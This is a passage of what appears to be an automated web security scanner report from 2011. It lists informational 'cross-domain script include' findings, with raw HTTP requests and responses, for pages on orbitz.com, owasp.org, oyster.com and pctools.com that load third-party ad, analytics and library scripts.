P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:11 GMT
Content-Length: 547361

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663131709&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Orlando&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.839. http://www.orbitz.com/hotels/United_States--IL/Chicago/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--IL/Chicago/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7772DAA91090BC9F1B85EAC0BFE8002C; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:56 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:48 GMT
Content-Length: 556129

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663169294&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Chicago&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.840. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--NV/Las_Vegas/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las%20Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las%20Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las%20Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A92F5F73440CFC82F9CDCCCE0E333AA; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:11 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:04 GMT
Content-Length: 568405

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las+Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las+Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663124692&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Las+Vegas&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.841. http://www.orbitz.com/hotels/United_States--NY/New_York/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/United_States--NY/New_York/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New%20York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New%20York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New%20York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F3E51A36EFA6771EA083391BE90BF2E0; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:36 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:29 GMT
Content-Length: 553304

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New+York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New+York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663149905&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=US&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=New+York&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.842. http://www.orbitz.com/shop/hotelsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

18.843. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The response dynamically includes the following script from another domain:

https://www.revresda.com/js.ng/channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&

Request

Response

18.844. https://www.orbitz.com/account/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/account/login

Issue detail

The response dynamically includes the following script from another domain:

https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

18.845. https://www.orbitz.com/account/registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/account/registration

Issue detail

The response dynamically includes the following script from another domain:

https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7D6B6C6B73BC640D7493A94555D7334; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:35 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:16:28 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure
Content-Length: 23404

...[SNIP]...

<script type="text/javascript" src="https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...

18.846. https://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The response dynamically includes the following script from another domain:

https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

18.847. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owasp.org
Path:	/index.php/XSS_(Cross_Site_Scripting

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.5.1/build/event/event-min.js
http://yui.yahooapis.com/2.5.1/build/history/history-min.js
http://yui.yahooapis.com/2.5.1/build/tabview/tabview-min.js
http://yui.yahooapis.com/2.5.1/build/utilities/utilities.js

Request

GET /index.php/XSS_(Cross_Site_Scripting HTTP/1.1
Host: www.owasp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 07:49:16 GMT
Server: Apache/2.2.14 (Fedora)
Vary: Accept-Encoding,Cookie
Content-language: en
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0f2081f46781753f4bba5901cbda15b0; expires=Fri, 03-Feb-2012 07:49:17 GMT; path=/
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wiki15Token;string-contains=wiki15LoggedOut;string-contains=wiki15_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/utilities/utilities.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/tabview/tabview-min.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/event/event-min.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/history/history-min.js"></script>
...[SNIP]...

18.848. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owasp.org
Path:	/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/2.5.1/build/event/event-min.js
http://yui.yahooapis.com/2.5.1/build/history/history-min.js
http://yui.yahooapis.com/2.5.1/build/tabview/tabview-min.js
http://yui.yahooapis.com/2.5.1/build/utilities/utilities.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 07:49:12 GMT
Server: Apache/2.2.14 (Fedora)
Vary: Accept-Encoding,Cookie
Content-language: en
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b37c1879c52d48eed3346aeb5dce8a8d; expires=Fri, 03-Feb-2012 07:49:13 GMT; path=/
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wiki15Token;string-contains=wiki15LoggedOut;string-contains=wiki15_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Wed, 12 Jan 2011 20:54:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/utilities/utilities.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/tabview/tabview-min.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/event/event-min.js"></script> <script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/history/history-min.js"></script>
...[SNIP]...

18.849. http://www.oyster.com/boston/hotels/millennium-bostonian/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oyster.com
Path:	/boston/hotels/millennium-bostonian/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://edge.quantserve.com/quant.js

Request

GET /boston/hotels/millennium-bostonian/ HTTP/1.1
Host: www.oyster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.43
Date: Wed, 02 Feb 2011 16:09:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: abcell=9; Domain=.oyster.com; expires=Thu, 02-Feb-2012 16:15:53 GMT; Path=/
Cache-Control: max-age=3600
Content-Length: 127262

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head profile="http://www.w3.org/2005/10/profile">
<title>Millennium Bostonian, Downtown
...[SNIP]...
</script> <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.850. http://www.pctools.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET / HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Thu, 03 Feb 2011 06:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33414

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>PC Tools | Download Antivirus Software & PC Software Utilities</ti
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

18.851. http://www.pctools.com/firewall/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/firewall/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET /firewall/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Thu, 03 Feb 2011 06:48:20 GMT
Content-Length: 28827
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Free Firewall Download | PC Tools Firewall Plus
</title>
<meta http-
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

18.852. http://www.pctools.com/free-antivirus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pctools.com
Path:	/free-antivirus/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET /free-antivirus/ HTTP/1.1
Host: www.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

